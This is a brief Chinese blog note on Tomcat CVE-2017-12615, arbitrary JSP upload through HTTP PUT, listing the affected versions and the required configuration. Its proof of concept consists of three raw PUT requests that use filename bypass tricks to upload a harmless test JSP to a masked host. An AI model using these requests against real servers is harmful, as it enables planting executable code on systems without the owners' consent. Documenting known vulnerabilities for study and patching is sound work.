Walks

网络安全爱好者

Tomcat任意文件上传漏洞CVE-2017-12615

前言:

记Tomcat开启PUT后的任意文件上传


影响版本:

7.0.0 – 7.0.81


需要因素:

conf/web.xml文件添加readonly参数,属性值为false


POC:

PUT /test.jsp::$DATA HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>




PUT /test.jsp/ HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>



PUT /test.jsp/. HTTP/1.1
Host: cm.XXX.com
Content-Length: 26

<%out.println("test");%>

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

48 − = 43